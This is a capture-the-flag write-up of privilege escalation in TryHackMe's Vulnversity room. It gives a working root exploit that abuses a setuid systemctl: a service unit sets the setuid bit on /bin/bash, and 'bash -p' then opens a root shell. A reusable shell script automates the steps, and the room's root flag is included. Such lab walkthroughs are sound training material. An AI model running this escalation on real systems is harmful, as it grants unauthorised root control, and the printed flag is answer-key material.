CTF – Vulnversity Privilege Escalation

Task 5 of TryHackMe’s Vulnversity CTF room is Privilege Escalation. Previously we compromised the web server by uploading a reverse-shell payload in a PHTML file.

Now that we’ve got a foothold on the box, can we achieve root-level access?

Task 5 – Privilege Escalation

Our task: now that we have compromised this machine, we are going to escalate our privileges and become the superuser (root).

First of all we need to find the SUID files they’re referring to.

Use the following command to find all files with the SUID bit set (mode 4000; the leading minus in -perm -4000 means “at least these bits”), redirecting all the errors (there’ll be a lot of permission denied messages) into the null abyss.

find / -perm -4000 2>/dev/null

This brings back a half-decent list of binaries with the SetUID bit on them. Most are standard distro helpers (passwd, sudo, mount, ping and friends); the interesting ones are those that shouldn’t be there.

/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/bash
/bin/ping
/bin/fusermount
/sbin/mount.cifs

A careful analysis of this list reveals one file in particular that we can try to exploit: /bin/systemctl. On a stock install systemctl is not SUID, and a setuid-root systemctl lets any local user create and start services that run as root. Note that /bin/bash also appears in this list; if it really is setuid root already, bash -p alone would suffice, so it is worth checking with ls -l before building anything.

Some info from the freedesktop.org manual page for systemctl (systemctl.html):

systemctl — Control the systemd system and service manager

systemctl may be used to introspect and control the state of the “systemd” system and service manager. Please refer to systemd(1) for an introduction into the basic concepts and functionality this tool manages.

Researching a potential avenue led me to klockw3rks’ article, which shows this script as part of the payload:

After spending some time analysing and tweaking this, some additional info from John Hammond helped me come to this working payload:

$ echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > /tmp/root.service

The unit is a one-shot service whose only job is to set the setuid/setgid bits on /bin/bash; the [Install] section is what lets it be enabled. We then link the unit file into systemd’s unit directory (the setuid systemctl does this as root):

$ /bin/systemctl link /tmp/root.service

Created symlink from /etc/systemd/system/root.service to /tmp/root.service.

We can then fire off the escalation. enable --now both enables the unit and starts it immediately, so systemd (running as root) executes the ExecStart line:

$ /bin/systemctl enable --now /tmp/root.service

Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /tmp/root.service.

If we then check the permissions on bash:

$ ls -lah /bin/bash

-rwsr-sr-x 1 root root 1014K May 16 2017 /bin/bash

The 4th character of the mode string (the owner’s execute slot) is now an ‘s’, meaning setuid; chmod +s also set the group slot, hence the second ‘s’. Because the file is owned by root, anyone who runs it gets an effective UID of 0.

Now if we run the following, we are escalated to the lofty heights of root. The -p (privileged) flag matters: without it, bash drops the effective UID back to the real UID on start-up, and the setuid bit would buy us nothing:

bash -p

It may look like the command has hung and there is no prompt; the shell is just a bit mucked up. You can still issue commands, e.g.:

whoami
root
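The whole procedure above (enumerate SUID files, triage the odd ones, write the unit, check the bits, escalate), as an added example written for this page rather than taken from the write-up or from TryHackMe. The BASELINE list of expected distro SUID helpers is a constructed illustration, not an authoritative allow-list, and the file paths assume a Debian/Ubuntu-style layout like the one in the room:

```shell
#!/bin/sh
# Added example: the SUID hunt and the setuid-systemctl abuse from the
# write-up, wrapped in functions so the triage and unit generation can be
# exercised without root.  BASELINE is a constructed list of common distro
# setuid helpers (an assumption, not an allow-list from any vendor);
# anything not in it deserves a closer look.

BASELINE="/usr/bin/sudo /usr/bin/passwd /usr/bin/chsh /usr/bin/chfn \
/usr/bin/newgrp /usr/bin/gpasswd /usr/bin/pkexec /bin/su /bin/mount \
/bin/umount /bin/ping /bin/ping6 /bin/fusermount"

# suid_scan: list regular files with the setuid bit (mode 4000) on the
# live system; permission-denied noise goes to /dev/null.
suid_scan() {
    find / -type f -perm -4000 2>/dev/null
}

# suid_triage: read paths on stdin, print those absent from BASELINE.
# Fed the write-up's list, this surfaces /bin/systemctl and /bin/bash.
suid_triage() {
    while IFS= read -r path; do
        case " $BASELINE " in
            *" $path "*) ;;                 # expected distro helper
            *) printf '%s\n' "$path" ;;     # unusual: investigate
        esac
    done
}

# mode_has_suid: given an ls -l mode string such as -rwsr-sr-x, succeed if
# the owner-execute slot (4th character) carries setuid.  A capital S means
# setuid without execute, which still counts.
mode_has_suid() {
    case "$1" in
        ???[sS]*) return 0 ;;
        *)        return 1 ;;
    esac
}

# write_unit: write the one-shot unit from the write-up to $1.  When
# systemd runs it as root, /bin/bash becomes setuid/setgid root.
write_unit() {
    cat > "$1" <<'EOF'
[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target
EOF
}

# escalate: only meaningful where /bin/systemctl is itself setuid root;
# refuses to run otherwise.  Afterwards /bin/bash -p gives a root shell.
escalate() {
    unit=${1:-/tmp/root.service}
    if ! mode_has_suid "$(ls -l /bin/systemctl 2>/dev/null | cut -c1-10)"; then
        echo "systemctl is not setuid; this trick does not apply" >&2
        return 1
    fi
    write_unit "$unit"
    /bin/systemctl link "$unit" && /bin/systemctl enable --now "$unit" || return 1
    mode_has_suid "$(ls -l /bin/bash | cut -c1-10)" && echo "now run: /bin/bash -p"
}

# Usage on the target:  . ./suidhunt.sh; suid_scan | suid_triage; escalate
```

Sourcing the file and running `suid_scan | suid_triage` reproduces the triage step on a live box; `escalate` is deliberately gated on the mode string of /bin/systemctl so it does nothing on a machine where the misconfiguration is absent.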

Finally the flag at /root/root.txt is accessible:

a58ff8579f0a9270368d33a9966c7fd5

With that task completed, TryHackMe’s Vulnversity room is done.
